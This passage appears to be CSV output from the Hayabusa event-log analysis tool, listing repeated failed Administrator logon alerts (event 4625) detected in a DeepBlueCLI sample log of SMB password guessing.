NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:03.920 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sbJC5yvrIymYgaHY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:03.951 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4schZcUP8Im8Ee1e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:03.988 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WotargyGlEq9PBch | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:04.025 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2JSMrPoucOR0nzlD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:04.064 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jr4w4uoF2DVZ5n9x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:04.104 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v319oZIaOBpuf542 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:04.151 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GNRTL9BLlGWMx6dA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:04.192 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zHlDIOZ9B5uY8Rzz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:04.248 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dr2bvAue8mr5kagX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:04.284 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pXBds9GoXr6IZUfp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:04.327 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aLYuegjXO18lo342 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:04.367 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: To3MMEEvNXKNjKHT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:04.416 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N0HCToTmh3ESGBYt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:04.455 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nNvBueVo3ANNmSSN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:04.499 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mVWOoAG5ermGL2Gl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:04.545 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W7QYJUNPm5b4jprh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:04.590 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PHllwNJvpH3P97cp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:04.632 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tfT8GtafHGYMlkMf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:04.680 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nab7wtZfBVkcynsa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:04.733 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VHiijj7sT9nyqxii | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:04.780 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v06kkhqYNOyEHx2c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:04.820 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WSTDX16YK5Zgkjxo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:04.861 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u6QWEyTrpndCagP0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:04.914 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7iCaXa5SR5IHJnQA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:04.956 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DNZhcPd1JaNFZMYG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:05.000 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LeOIg10KS60QplWz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:05.036 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: um3Nwo2doDbKJJvz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:05.150 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JuoqbUwc2Nth1xlH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:05.199 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WF8zKIbeboTLLkC6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:05.237 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kSyKc8igfuYLMekV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:05.285 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LHog0TdOci9CCKBa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:05.328 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R5ilFaQlemZUSNun | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:05.374 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JOJnv9vFdqr2VSQC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:05.421 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rXaoVN7FvJ5rRDUF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:05.482 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kaFCT5QYFfmJpEC1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:05.547 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kOdVfL4XUTLp60tC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:05.597 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wFQSXjz0JTlkwpBu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:05.634 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sgAVlnENp6IzRRDr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:05.697 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JLkeKKFVP5vJjPtl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:05.751 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EqLXdGmr45vGpu3E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:05.801 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m7uTpMLqPgenJdRb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:05.852 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FQn7NqRzpGtjQdfv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:05.901 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8F8EZLHQtEWkeob1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:05.936 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5joxW81M9vcAfbJw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:05.988 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iMfmQF3xsaV5SQVZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:06.040 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QQe9VL8eeco0SdPW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:06.080 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MnMbxQEuczrnMLKc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:06.137 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3DWOiTIp6JQLq9Vz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:06.180 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E1ORteg467kiFxmD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:06.216 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EoVhHZ2lkyAEx0w9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:06.260 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IMSqYaVVGR5v3bXr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:06.298 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hEEJ05nL0lyatWKL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:06.349 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SgrcS1NqwVJSEv31 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:06.395 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CCNTu1A6c6myngXd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:06.434 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YLx5Hv5GmdvsO9SE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:06.468 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VtS3KUkTVoAWGqbW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:06.512 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7DxfDEwc6ykrmddu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:06.552 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m8yKyocZwOY574pe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:06.596 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JfdmcsxnDHRxJYAA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:06.649 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: euxBOcdse8NjSzTd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:06.696 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dw7RZh5jKuRcM1xw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:06.742 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zIyozsYA1Mn27gl7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:06.786 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vhJopROjHZi6T8aF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:06.822 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QZ6XuZO6fIMg52tV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:06.870 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tvAYEepvDwz93ezW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:06.919 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6Er95vLjet49OmSQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:06.960 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OKkMGZ5on5L26cip | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:07.000 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dp5dq3YYmmLxperL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:07.051 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: klkWqfYoNQQHRISX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:07.092 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q0EekPO3q6qRfq3i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:07.144 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gfG1x6sL4Aqlj7TK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:07.185 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: owSUehMmDEhijkfl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:07.224 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J3xBPT5WiuvmPZHe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:07.264 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gIufEPz8FBVd5yKe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:07.309 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6Blruxd110NvZjof | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:07.364 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0VsPitzItsjU3Y59 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:07.460 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HEq6vk4nTe3weSOP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:07.507 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lE8kvmcQtCmlsqtT | IP Addr: 192.168.198.149 | AuthPackage: 